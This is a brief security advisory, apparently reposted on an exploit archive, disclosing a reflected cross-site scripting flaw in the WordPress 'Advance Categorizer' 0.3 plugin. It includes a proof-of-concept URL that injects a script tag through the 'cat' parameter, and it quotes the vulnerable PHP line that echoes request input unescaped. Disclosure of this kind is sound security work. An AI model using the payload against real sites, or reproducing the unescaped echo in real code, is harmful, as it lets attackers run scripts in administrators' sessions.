WordPress Advance Categorizer 0.3 Cross Site Scripting Vulnerability

Full Baslik	WordPress Advance Categorizer 0.3 Cross Site Scripting Vulnerability
Eklenme Tarihi	04-08-2015
Kategori	web applications
Platform	php
Risk	Security Risk Low

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

Title: WordPress 'Advance Categorizer' Plugin Version: 0.3 Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej Date: 2015-06-24 Download: - https://wordpress.org/plugins/advance-categorizer/ - https://plugins.svn.wordpress.org/advance-categorizer/ Notified WordPress: 2015-06-24 ==========================================================   ## Plugin description ========================================================== Allows you to add multiple categories using comma seperated text. You can also start via url "/wp-admin/post-new.php?cat=category1, category2, categor   ## Reflected XSS vulnerabilities ========================================================== The plugin is vulnerable to reflected XSS, which allow an attacker to trick an admin into executing an arbitrary script in the admin panel.   PoC: Log in as admin and visit this url: [URL]/wp-admin/post-new.php?cat=asdf"/><script>confirm(/Hackedihack/)</script>   Vulnerable code in file advance-categorizer.php:   L.61: ... value="<?=isset($_GET['cat'])?$_GET['cat']:(isset($_GET['categories'])?$_GET['categories']:'');?>" ...     ## Solution ========================================================== No fix available   ========================================================== Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.   # 0day.today [2015-08-04] # fb.com/inj3ct0rs and twitter.com/inj3ct0r